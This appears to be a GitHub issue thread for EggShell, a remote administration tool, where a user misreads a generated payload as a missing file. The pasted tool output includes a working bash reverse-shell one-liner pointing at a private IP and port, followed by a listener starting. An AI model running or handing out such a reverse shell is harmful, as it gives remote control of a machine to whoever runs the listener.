lucasjacks0n / EggShell

iOS/macOS/Linux Remote Administration Tool
GNU General Public License v2.0
1.66k stars 382 forks source link

payload file doesnt exist #128

Closed Mimmob07 closed 4 years ago

Mimmob07 commented 4 years ago

the payload file is nowhere to be found! it says it's in /dev/tcp/192.168.1.6/8080 0>&1 but it's not the file doesn't exist can someone help me find it, please?


Created By Lucas Jackson (@neoneggplant)
----------------------------------------
Menu:

    1): Start Server
    2): Start MultiHandler
    3): Create Payload
    4): Exit

EggShell> 3
----------------------------------------
Payloads:

    1): bash
    2): Teensy macOS

[*] Choose an payload> 1
[*] SET LHOST (Leave blank for 192.168.1.6)>
[*] LHOST = 192.168.1.6
[*] SET LPORT (Leave blank for 4444)>8080
[*] LPORT = 8080
----------------------------------------
bash &> /dev/tcp/192.168.1.6/8080 0>&1
----------------------------------------
EggShell> Start Server? (Y/n): Y
EggShell> MultiHandler? (y/N): n
[*] Listening on port 8080...```
Mimmob07 commented 4 years ago

my bad didn't realize/dev/tcp/192.168.1.6/8080 0>&1 was a command